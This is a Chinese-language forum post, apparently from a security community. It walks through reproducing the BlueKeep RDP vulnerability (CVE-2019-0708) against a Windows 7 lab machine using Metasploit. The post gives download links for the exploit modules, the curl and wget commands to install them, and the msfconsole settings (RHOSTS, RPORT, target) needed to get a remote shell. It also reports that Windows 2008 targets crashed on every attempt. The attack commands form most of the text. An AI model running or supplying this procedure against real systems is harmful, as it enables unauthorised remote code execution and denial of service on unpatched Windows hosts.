CVE-2019-0708复现过程以及稳定性测试
作者:08sec-Dmagic准备材料 Windows7 和 windows2008 r2的镜像 poc下载链接: https://pan.baidu.com/s/1TAhulC6IVhcn8OmBOHX4xA 提取码: 3d7d
目标ip:192.168.3.20 本机ip:192.168.3.24 目标os:windows 7 SP1 X64 本机os:kali 目标RDP端口:3389
测试过程: 先更新一下 Msf Curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
然后将各个文件分别放入
/opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
使用msfconsole进入metasploit-framework
进入以后使用reload_all重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用info查看工具相关信息以及设置 可见关键设置主要为RHOSTS\ RPORT \ target
使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构
这里我们使用的是VMware Fusion,那么target 3满足条件
使用run开始攻击,等待建立连接
然后shell接着python就好了
稳定性测试:windows7 测试五次全部成功 windows2008 十次全部蓝屏。
顶 遇到exp下载失败可试试一下链接
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
下载完成后复制到/metasploit-framework相关文件夹里 来支持下
页:
[1]